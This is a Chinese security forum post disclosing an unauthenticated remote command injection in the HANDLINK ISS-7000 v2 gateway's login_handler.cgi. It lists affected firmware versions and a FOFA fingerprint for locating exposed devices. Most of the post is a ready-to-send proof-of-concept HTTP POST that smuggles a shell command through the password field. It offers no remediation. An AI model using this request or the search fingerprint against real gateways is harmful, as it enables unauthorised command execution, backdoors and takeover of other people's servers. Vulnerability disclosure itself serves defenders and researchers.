HANDLINK ISS-7000v2 网关 login_handler.cgi 命令注入-网络安全论坛-网络安全-阻击者联盟

HANDLINK ISS-7000v2 网关 login_handler.cgi 命令注入

勾八徽章-人气大使-阻击者联盟等级-LV2-阻击者联盟7天前更新
210
漏洞描述:

瀚霖科技股份有限公司ISS-7000 v2网络网关服务器 /login_handler.cgi接口存在远程命令执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系统命令,写入后门文件,获取服务器权限。

影响版本:

ISS-7000 v2固件版本1.00.06 、1.00.08

FOFA:

icon_hash="-842942564"

8719bf84ad20250510070307

POC:

POST /login_handler.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 74
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
username=admin&password=admin|id&uilng=3&button=%E7%99%BB%E5%85%A5&Signin=
评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布帖子
在手机上浏览此页面